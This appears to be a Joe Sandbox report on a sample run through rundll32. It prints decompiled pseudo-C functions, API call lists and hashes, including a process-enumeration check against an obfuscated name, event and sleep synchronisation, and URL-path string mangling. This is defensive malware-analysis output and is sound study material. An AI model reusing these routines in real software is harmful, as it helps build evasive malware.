                                • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04A42A9A
                                • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04A42AB0
                                • memset.NTDLL ref: 04A42B50
                                • memset.NTDLL ref: 04A42B60
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: memset$_allmul_aulldiv
                                • String ID:
                                • API String ID: 3041852380-0
                                • Opcode ID: 70da8308fd115e5db83d06ce01378e4084fdfa995d3f96b6a987ee20588dc3d8
                                • Instruction ID: d5059cf8c838a74174d11981b28ee310f25512ffa8c18cbdf6d220033c6769c0
                                • Opcode Fuzzy Hash: 70da8308fd115e5db83d06ce01378e4084fdfa995d3f96b6a987ee20588dc3d8
                                • Instruction Fuzzy Hash: B8415F72A00209ABDB20DFA8CD40BDE7775EFC8754F508569B919AB180DB70B955CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A46150, Relevance: 6.1, APIs: 4, Instructions: 96synchronizationCOMMON
                                Download Yara Rule
                                C-Code - Quality: 87%
                                			E04A46150(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x4a4d270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x4a4d2a8; // 0x40a5a8
				_t3 = _t8 + 0x4a4e87e; // 0x61636f4c
				_t25 = 0;
				_t30 = E04A410B1(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x4a4d2ac, 1, 0, _t30);
					E04A48B22(_t30);
				}
				_t12 =  *0x4a4d25c; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E04A48F1B() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E04A43485(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x4a4d10c( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E04A48B7B(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}














                                0x04a46151
                                0x04a46158
                                0x04a46162
                                0x04a46166
                                0x04a4616c
                                0x04a4617b
                                0x04a46182
                                0x04a46186
                                0x04a46198
                                0x04a4619a
                                0x04a4619a
                                0x04a4619f
                                0x04a461a6
                                0x04a461fd
                                0x04a461fd
                                0x04a46203
                                0x04a46205
                                0x04a46205
                                0x04a4620f
                                0x04a46213
                                0x04a46225
                                0x04a46225
                                0x04a46229
                                0x04a4622f
                                0x04a4622f
                                0x00000000
                                0x04a461bf
                                0x04a461c4
                                0x04a461cc
                                0x04a461d0
                                0x04a461d4
                                0x04a461d4
                                0x04a461e1
                                0x04a461e5
                                0x04a461e9
                                0x04a4623e
                                0x04a46244
                                0x04a46244
                                0x04a461f7
                                0x04a461fb
                                0x04a46232
                                0x04a46234
                                0x04a46237
                                0x04a46237
                                0x00000000
                                0x04a46234
                                0x04a461fb
                                0x00000000
                                0x04a461e5

                                APIs
                                  • Part of subcall function 04A410B1: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,04E59D18,00000000,?,?,69B25F44,00000005,04A4D00C,?,?,04A430FE), ref: 04A410E7
                                  • Part of subcall function 04A410B1: lstrcpy.KERNEL32(00000000,00000000), ref: 04A4110B
                                  • Part of subcall function 04A410B1: lstrcat.KERNEL32(00000000,00000000), ref: 04A41113
                                • CreateEventA.KERNEL32(04A4D2AC,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,04A4991F,?,00000001,?), ref: 04A46191
                                  • Part of subcall function 04A48B22: RtlFreeHeap.NTDLL(00000000,00000000,04A4131A,00000000,?,?,00000000), ref: 04A48B2E
                                • WaitForSingleObject.KERNEL32(00000000,00004E20,04A4991F,00000000,00000000,?,00000000,?,04A4991F,?,00000001,?,?,?,?,04A47D37), ref: 04A461F1
                                • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,04A4991F,?,00000001,?), ref: 04A4621F
                                • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,04A4991F,?,00000001,?,?,?,?,04A47D37), ref: 04A46237
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                • String ID:
                                • API String ID: 73268831-0
                                • Opcode ID: 11b2814db2ff18bec692cc203a1aa6b6829a4806bb335ebca5dad23ac48a787d
                                • Instruction ID: f110445f419119b4d63b677a6d1a6583ab602344c4cb9a967ab9d4a114aede0e
                                • Opcode Fuzzy Hash: 11b2814db2ff18bec692cc203a1aa6b6829a4806bb335ebca5dad23ac48a787d
                                • Instruction Fuzzy Hash: 9A212332A023116BE7316FAC9C84A6F7399EBDAB21F150629FD46DF101DB7DEC428650
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A49870, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                Download Yara Rule
                                C-Code - Quality: 40%
                                			E04A49870(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E04A42931(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E04A48DAB(_t23);
						}
					}
					return _t38;
				}
				if(E04A4155A(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x4a4d2ac, 1, 0,  *0x4a4d344);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E04A45BC0(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E04A44B2A(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E04A44FF0(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E04A46150( &_v32, _t39);
					goto L13;
				}
			}












                                0x04a49870
                                0x04a4987d
                                0x04a49883
                                0x04a49884
                                0x04a49885
                                0x04a49886
                                0x04a49887
                                0x04a4988b
                                0x04a49897
                                0x04a4989b
                                0x04a49923
                                0x04a49923
                                0x04a49926
                                0x04a49928
                                0x04a49930
                                0x04a49930
                                0x04a49936
                                0x04a49939
                                0x04a49939
                                0x04a49936
                                0x04a49944
                                0x04a49944
                                0x04a498ae
                                0x04a498b0
                                0x04a498b0
                                0x04a498c7
                                0x04a498cb
                                0x04a498ce
                                0x04a498d9
                                0x04a498e0
                                0x04a498e0
                                0x04a498e9
                                0x04a498ed
                                0x04a498fb
                                0x04a498ef
                                0x04a498ef
                                0x04a498f0
                                0x04a498f1
                                0x04a498f2
                                0x04a498f3
                                0x04a498f4
                                0x04a498f4
                                0x04a49900
                                0x04a49903
                                0x04a49907
                                0x04a49909
                                0x04a49909
                                0x04a49910
                                0x00000000
                                0x04a49912
                                0x04a49912
                                0x04a4991f
                                0x00000000
                                0x04a4991f

                                APIs
                                • CreateEventA.KERNEL32(04A4D2AC,00000001,00000000,00000040,00000001,?,74E5F710,00000000,74E5F730,?,?,?,04A47D37,?,00000001,?), ref: 04A498C1
                                • SetEvent.KERNEL32(00000000,?,?,?,04A47D37,?,00000001,?,00000002,?,?,04A4312C,?), ref: 04A498CE
                                • Sleep.KERNEL32(00000BB8,?,?,?,04A47D37,?,00000001,?,00000002,?,?,04A4312C,?), ref: 04A498D9
                                • CloseHandle.KERNEL32(00000000,?,?,?,04A47D37,?,00000001,?,00000002,?,?,04A4312C,?), ref: 04A498E0
                                  • Part of subcall function 04A45BC0: WaitForSingleObject.KERNEL32(00000000,?,?,?,04A49900,?,04A49900,?,?,?,?,?,04A49900,?), ref: 04A45C9A
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                • String ID:
                                • API String ID: 2559942907-0
                                • Opcode ID: 30049cb54acdbd1e43e54076ef075e1e5a04bf1888c5e7bdd647c75b8f2e3904
                                • Instruction ID: 9108264a0b5c2e12dc42a1c84959b65cbda2ff2aef74f6983f41b50461f3720f
                                • Opcode Fuzzy Hash: 30049cb54acdbd1e43e54076ef075e1e5a04bf1888c5e7bdd647c75b8f2e3904
                                • Instruction Fuzzy Hash: A421A4B7D00219ABDB20AFF489849DF77BCEFC8364B014425EA15E7200E775B9468BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A45F58, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 78%
                                			E04A45F58(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E04A41525(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                0x04a45f64
                                0x04a45f68
                                0x04a45f69
                                0x04a45f6a
                                0x04a45f6c
                                0x04a45f6e
                                0x04a45f71
                                0x04a45f76
                                0x04a4600d
                                0x04a46014
                                0x04a46014
                                0x04a45f7f
                                0x04a45f86
                                0x04a45f96
                                0x04a45f96
                                0x04a45f9c
                                0x04a45f9e
                                0x04a45fa3
                                0x04a45fac
                                0x04a45fb2
                                0x04a45fb7
                                0x04a45fc2
                                0x04a45fc6
                                0x04a45fc8
                                0x04a45fc9
                                0x04a45fd2
                                0x04a45fd6
                                0x04a45fe7
                                0x04a45fd8
                                0x04a45fdd
                                0x04a45fe2
                                0x04a45ff1
                                0x04a45ff1
                                0x04a45fc6
                                0x04a45ff7
                                0x04a45ffd
                                0x04a45ffd
                                0x04a46006
                                0x04a4600b
                                0x04a4600b
                                0x00000000

                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: FreeSleepStringlstrlenmemcpy
                                • String ID:
                                • API String ID: 1198164300-0
                                • Opcode ID: 8409a00a587c9ac864aa788ffa49eff47e662bec881d67c017e51111bfb4d55d
                                • Instruction ID: 32d2957ce4bf620819336e0e5a7ac5cc954dc48a34b08d5d5bfdd3c458909c2e
                                • Opcode Fuzzy Hash: 8409a00a587c9ac864aa788ffa49eff47e662bec881d67c017e51111bfb4d55d
                                • Instruction Fuzzy Hash: 35217175901209FFDB11DFA8D98499EBBB5FFC9310B108169E906D7240EB35EA01CF61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A4A41C, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 68%
                                			E04A4A41C(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x4a4d238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x4a4d250; // 0x82126d82
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x4a4d250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                0x04a4a424
                                0x04a4a427
                                0x04a4a42d
                                0x04a4a445
                                0x04a4a447
                                0x04a4a44c
                                0x04a4a44e
                                0x04a4a451
                                0x04a4a453
                                0x04a4a456
                                0x04a4a458
                                0x04a4a458
                                0x04a4a45a
                                0x04a4a465
                                0x04a4a46a
                                0x04a4a47b
                                0x04a4a483
                                0x04a4a488
                                0x04a4a48b
                                0x04a4a48e
                                0x04a4a490
                                0x04a4a493
                                0x04a4a496
                                0x04a4a496
                                0x04a4a499
                                0x04a4a4a4
                                0x04a4a4a9
                                0x04a4a4b3

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04A47C20,00000000,?,?,04A49DA0,?,04E595B0), ref: 04A4A427
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 04A4A43F
                                • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04A47C20,00000000,?,?,04A49DA0,?,04E595B0), ref: 04A4A483
                                • memcpy.NTDLL(00000001,?,00000001), ref: 04A4A4A4
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: memcpy$AllocateHeaplstrlen
                                • String ID:
                                • API String ID: 1819133394-0
                                • Opcode ID: 6c20ad4f4e325420e43bf0657d5c7a9fa742e6915566706be13fcf84002250b2
                                • Instruction ID: d3f76eab1de519d190bb169c7c6c33e6f939d2bace066cf9e7b8e29e9fbdd562
                                • Opcode Fuzzy Hash: 6c20ad4f4e325420e43bf0657d5c7a9fa742e6915566706be13fcf84002250b2
                                • Instruction Fuzzy Hash: E1112976A00114BFD3108FA9DC88D9EBBAEDBD4361B150276F505DB180E7759E01C760
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A48F1B, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                Download Yara Rule
                                C-Code - Quality: 68%
                                			E04A48F1B() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x4a4d2a8; // 0x40a5a8
						_t2 = _t9 + 0x4a4ee34; // 0x73617661
						_push( &_v264);
						if( *0x4a4d0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                                0x04a48f26
                                0x04a48f30
                                0x04a48f34
                                0x04a48f3e
                                0x04a48f6f
                                0x04a48f45
                                0x04a48f4a
                                0x04a48f57
                                0x04a48f60
                                0x04a48f77
                                0x04a48f62
                                0x04a48f6a
                                0x00000000
                                0x04a48f6a
                                0x04a48f78
                                0x04a48f79
                                0x00000000
                                0x04a48f79
                                0x00000000
                                0x04a48f73
                                0x04a48f7f
                                0x04a48f84

                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04A48F2B
                                • Process32First.KERNEL32(00000000,?), ref: 04A48F3E
                                • Process32Next.KERNEL32(00000000,?), ref: 04A48F6A
                                • CloseHandle.KERNEL32(00000000), ref: 04A48F79
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 420147892-0
                                • Opcode ID: 7ca779acfa7dfd3ff2f490f62bde7fad186e5b6072485981e3fad68196bff1a2
                                • Instruction ID: 6d3153e0046fe2e57aa5b5f8fc65b5735ac69c9abf730457b8a7f701215a3699
                                • Opcode Fuzzy Hash: 7ca779acfa7dfd3ff2f490f62bde7fad186e5b6072485981e3fad68196bff1a2
                                • Instruction Fuzzy Hash: 76F0B43A2011286BF720BB66AC49DEFB6ADDBD5714F000169E909D3040FA29FA4686B1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A48C01, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E04A48C01(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






                                0x04a48c0b
                                0x04a48c0f
                                0x04a48c24
                                0x04a48c26
                                0x04a48c2b
                                0x04a48c31
                                0x04a48c33
                                0x04a48c38
                                0x04a48c43
                                0x04a48c3a
                                0x04a48c3a
                                0x04a48c3a
                                0x04a48c38
                                0x04a48c51

                                APIs
                                • memset.NTDLL ref: 04A48C0F
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74E481D0), ref: 04A48C24
                                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 04A48C31
                                • CloseHandle.KERNEL32(?), ref: 04A48C43
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: CreateEvent$CloseHandlememset
                                • String ID:
                                • API String ID: 2812548120-0
                                • Opcode ID: 94b11bf17f477450968a0bcec4edf624190ad61edfdd96c77407c9cb834143ae
                                • Instruction ID: 1c1adb47c2c9de8f5f89f511e2096fd7fbf96aa3aefd49d6aff3b7f3d2609d20
                                • Opcode Fuzzy Hash: 94b11bf17f477450968a0bcec4edf624190ad61edfdd96c77407c9cb834143ae
                                • Instruction Fuzzy Hash: 68F089B910530CBFD3206F25DCC4C2FBBACEBD5599721492DF14681111D67ABC4D8A70
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A44DB1, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E04A44DB1() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x4a4d26c; // 0x2cc
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x4a4d2bc; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x4a4d26c; // 0x2cc
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x4a4d238; // 0x4a60000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                0x04a44db1
                                0x04a44db8
                                0x04a44e02
                                0x04a44e04
                                0x04a44e04
                                0x04a44dbc
                                0x04a44dc2
                                0x04a44dc7
                                0x04a44dcb
                                0x04a44dd1
                                0x04a44dd8
                                0x00000000
                                0x00000000
                                0x04a44dda
                                0x04a44ddf
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04a44ddf
                                0x04a44de1
                                0x04a44de9
                                0x04a44dec
                                0x04a44dec
                                0x04a44df2
                                0x04a44df9
                                0x04a44dfc
                                0x04a44dfc
                                0x00000000

                                APIs
                                • SetEvent.KERNEL32(000002CC,00000001,04A47F41), ref: 04A44DBC
                                • SleepEx.KERNEL32(00000064,00000001), ref: 04A44DCB
                                • CloseHandle.KERNEL32(000002CC), ref: 04A44DEC
                                • HeapDestroy.KERNEL32(04A60000), ref: 04A44DFC
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: CloseDestroyEventHandleHeapSleep
                                • String ID:
                                • API String ID: 4109453060-0
                                • Opcode ID: 308dae81138355eb0f8de7199f07653e39db7a89d4c0e5cec0ff19b193aa6a2c
                                • Instruction ID: 8fc0b11bd032479795ea6d5b026d859756308926539de08d7cfe5eb0869ce1e1
                                • Opcode Fuzzy Hash: 308dae81138355eb0f8de7199f07653e39db7a89d4c0e5cec0ff19b193aa6a2c
                                • Instruction Fuzzy Hash: C8F0A039B02311ABFB205B359908F4E3B98EBE8771B054210F914DB680CF2AEC02C660
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A48CFA, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 58%
                                			E04A48CFA(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E04A41525(_t2);
				if(_t34 != 0) {
					_t30 = E04A41525(_t28);
					if(_t30 == 0) {
						E04A48B22(_t34);
					} else {
						_t39 = _a4;
						_t22 = E04A4A7C2(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E04A4A7C2(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                0x04a48cfa
                                0x04a48d04
                                0x04a48d06
                                0x04a48d0c
                                0x04a48d0c
                                0x04a48d15
                                0x04a48d19
                                0x04a48d25
                                0x04a48d29
                                0x04a48d9d
                                0x04a48d2b
                                0x04a48d2b
                                0x04a48d2f
                                0x04a48d34
                                0x04a48d39
                                0x04a48d53
                                0x04a48d42
                                0x04a48d42
                                0x04a48d46
                                0x04a48d49
                                0x04a48d4e
                                0x04a48d4e
                                0x04a48d58
                                0x04a48d80
                                0x04a48d86
                                0x04a48d89
                                0x04a48d5a
                                0x04a48d5c
                                0x04a48d64
                                0x04a48d6f
                                0x04a48d74
                                0x04a48d74
                                0x04a48d90
                                0x04a48d97
                                0x04a48d98
                                0x04a48d98
                                0x04a48d29
                                0x04a48da8

                                APIs
                                • lstrlen.KERNEL32(00000000,00000008,?,74E04D40,?,?,04A49816,?,?,?,?,00000102,04A4937B,?,?,00000000), ref: 04A48D06
                                  • Part of subcall function 04A41525: RtlAllocateHeap.NTDLL(00000000,00000000,04A41278), ref: 04A41531
                                  • Part of subcall function 04A4A7C2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04A48D34,00000000,00000001,00000001,?,?,04A49816,?,?,?,?,00000102), ref: 04A4A7D0
                                  • Part of subcall function 04A4A7C2: StrChrA.SHLWAPI(?,0000003F,?,?,04A49816,?,?,?,?,00000102,04A4937B,?,?,00000000,00000000), ref: 04A4A7DA
